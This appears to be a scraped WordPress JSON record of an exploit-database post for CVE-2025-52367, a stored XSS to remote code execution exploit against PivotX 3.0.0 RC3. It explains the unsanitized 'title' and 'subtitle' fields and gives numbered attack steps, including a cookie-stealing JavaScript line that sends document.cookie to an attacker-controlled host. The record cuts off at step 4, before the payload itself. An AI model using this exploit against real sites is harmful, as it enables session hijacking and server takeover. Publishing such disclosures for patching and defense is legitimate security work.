{"id":8217,"date":"2025-07-16T03:36:20","date_gmt":"2025-07-16T03:36:20","guid":{"rendered":"http:\/\/localhost\/?p=8217"},"modified":"2025-07-16T03:36:20","modified_gmt":"2025-07-16T03:36:20","slug":"pivotx-300-rc3-remote-code-execution-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=8217","title":{"rendered":"PivotX 3.0.0 RC3 – Remote Code Execution (RCE)"},"content":{"rendered":"

Exploit Details<\/h2>\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Exploit Title<\/th>\nPivotX 3.0.0 RC3 – Remote Code Execution (RCE)<\/td>\n<\/tr>\n
Exploit ID<\/th>\nEDB-ID:52361<\/td>\n<\/tr>\n
Type<\/th>\nexploitdb<\/td>\n<\/tr>\n
Published<\/th>\n2025-07-16T00:00:00<\/td>\n<\/tr>\n
Modified<\/th>\n2025-07-16T00:00:00<\/td>\n<\/tr>\n<\/table>\n

CVSS Information<\/h3>\n\n\n\n
Severity<\/th>\nNONE<\/td>\n<\/tr>\n
Vector<\/th>\nNONE<\/td>\n<\/tr>\n<\/table>\n

CVE Information<\/h3>\n
\n
    \n
  • CVE-2025-52367<\/li>\n<\/ul>\n<\/div>\n

    Exploit Description<\/h3>\n
    \nExploit Title: PivotX v3.0.0 RC3 – Stored XSS to Remote Code Execution (RCE) Date: July 2025 Exploit Author:…\n<\/div>\n

    Exploit Code<\/h3>\n
    \n# Exploit Title: PivotX v3.0.0 RC3 – Stored XSS to Remote Code Execution (RCE)
    \n
    # Date: July 2025
    \n
    # Exploit Author: HayToN
    \n
    # Vendor Homepage: https:\/\/github.com\/pivotx
    \n
    # Software Link: https:\/\/github.com\/pivotx\/PivotX
    \n
    # Version: 3.0.0 RC3
    \n
    # Tested on: Debian 11, PHP 7.4
    \n
    # CVE : CVE-2025-52367<\/p>\n

    ## Vulnerability Type:
    \n
    Stored Cross-Site Scripting (XSS) in the “title” and “subtitle” fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize().<\/p>\n

    ## Root Cause:
    \n
    In ‘modules\/pages_flat.php’, function ‘savePage($page)’ stores page data via ‘saveSerialize()’ without any sanitization. The stored values are later rendered in the admin panel without escaping.<\/p>\n

    Only the ‘body’ and ‘introduction’ fields are passed through TinyMCE (which encodes HTML). ‘title’ and ‘subtitle’ are rendered as raw HTML.<\/p>\n

    Note: If you are already admin, skip steps 1-7
    \n
    ## Exploitation Steps:
    \n
    1. Login as an authenticated user (normal user, no need for admin).<\/p>\n

    2. Create a new Page via the dashboard, located at http:\/\/IP\/PivotX\/pivotx\/index.php?page=page<\/p>\n

    3. Create locally a JavaScript file contaning cookie stealing code.
    \n
    For example: lol.js
    \n
    Containing:
    \n
    document.location = ‘http:\/\/LOCAL_IP\/bruh?c=’ + document.cookie;<\/p>\n

    4. In the “Subtitle” field, input the following payload(Be sure to change the file name as yours):<\/p>\n